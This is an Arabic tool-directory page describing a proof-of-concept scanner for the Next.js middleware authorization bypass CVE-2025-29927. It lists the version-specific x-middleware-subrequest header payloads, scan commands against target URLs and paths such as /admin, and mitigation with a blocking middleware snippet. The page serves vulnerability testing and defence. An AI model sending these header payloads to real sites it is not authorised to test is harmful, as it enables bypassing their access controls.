Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-nextjs-CVE-2025-29927 — # ماسح PoC آلي لثغرة تجاوز الوسيطة في Next.js CVE-2025-29927 يقوم باختبار حمولات متعددة من `x-middleware-subrequest` عبر عناوين URL المستهدفة مع فحص متزامن وتصدير بصيغة JSON. | Kitploit
أدوات/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

# ماسح PoC آلي لثغرة تجاوز الوسيطة في Next.js CVE-2025-29927 يقوم باختبار حمولات متعددة من `x-middleware-subrequest` عبر عناوين URL المستهدفة مع فحص متزامن وتصدير بصيغة JSON.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح ثغرة Middleware Subrequest في Next.js

أداة إثبات مفهوم (PoC) قوية لاكتشاف ثغرة middleware في Next.js (CVE-2025-29927).

نظرة عامة

تختبر هذه الأداة ثغرة خطيرة في تطبيقات Next.js حيث يمكن استخدام الترويسة x-middleware-subrequest لتجاوز فحوصات الأمان المطبقة في middleware. يتضمن الاستغلال إرسال طلبات HTTP مع ترويسات خبيثة محددة، تختلف حسب إصدار Next.js.

كيف يعمل الاستغلال

وفقًا للبحث، توجد حمولات مختلفة لإصدارات مختلفة من Next.js:

  1. الإصدارات الأقدم من 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. الإصدارات من 12.2 فصاعدًا:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    أو

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (إذا كان التطبيق يستخدم دليل src)

  3. الإصدارات الأحدث (مثل 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

أو

root@kitploit:~
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

تختبر أداة PoC الخاصة بنا جميع هذه الحمولات تلقائيًا وتُبلغ عن أي منها نجح.

الميزات

  • اختبار هدف واحد أو أهداف متعددة
  • فحص متزامن مع تعدد الخيوط (multithreading)
  • مسارات طلب قابلة للتخصيص
  • اختبار تلقائي لجميع الحمولات الممكنة
  • مخرجات مفصّلة وملوّنة في الطرفية
  • تصدير النتائج إلى JSON
  • معالجة قوية للأخطاء
  • كشف شامل للثغرات

المتطلبات

  • Python 3.7+
  • الحزم المطلوبة:
    • requests
    • colorama

التثبيت

root@kitploit:~
# Clone o repositório ou baixe os arquivos
# Navegue até o diretório
cd poc-nextjs-2025

# Instale os pacotes necessários
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python main.py -u https://exemplo.com   # Testar uma única URL
python main.py -f alvos.txt             # Testar múltiplas URLs de um arquivo

وسائط سطر الأوامر

الخيارالوصف
-u, --url URLعنوان URL الهدف للفحص
-f, --file ARQUIVOملف يحتوي على عناوين URL متعددة للفحص (واحد في كل سطر)
-p, --paths CAMINHOSقائمة المسارات للاختبار مفصولة بفواصل (الافتراضي: المسارات الشائعة)
-t, --threads Nعدد الخيوط المتزامنة (الافتراضي: 5)
-o, --output ARQUIVOحفظ النتائج في ملف JSON
--timeout Nمهلة الطلب بالثواني (الافتراضي: 10)

أمثلة

root@kitploit:~
# Escaneamento básico de um único alvo
python main.py -u https://exemplo.com

# Escanear múltiplos alvos com caminhos personalizados
python main.py -f alvos.txt -p /api/users,/admin,/dashboard

# Escanear com maior concorrência e timeout mais longo
python main.py -u https://exemplo.com -t 10 --timeout 15

# Salvar resultados em um arquivo JSON
python main.py -u https://exemplo.com -o resultados_scan.json

منهجية الكشف

يعمل الماسح من خلال:

  1. إرسال طلب عادي إلى الهدف
  2. إرسال طلبات مع اختلافات مختلفة من الترويسة x-middleware-subrequest وفقًا لإصدارات Next.js
  3. مقارنة الاستجابات لتحديد مؤشرات الثغرة:
    • الطلب العادي محظور (4xx/5xx) لكن طلب الاستغلال مسموح به (2xx)
    • اختلاف كبير في محتوى الاستجابة
    • مؤشرات تجاوز المصادقة/التفويض

التخفيف

إذا اكتشفت تطبيقات معرضة للخطر، طبّق إجراءات التخفيف التالية:

  • قم بالتحديث إلى الإصدارات 14.2.25 أو 15.2.3 أو أحدث من Next.js
  • نفّذ middleware يمنع الطلبات التي تحمل الترويسة x-middleware-subrequest
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
تنزيل الأداة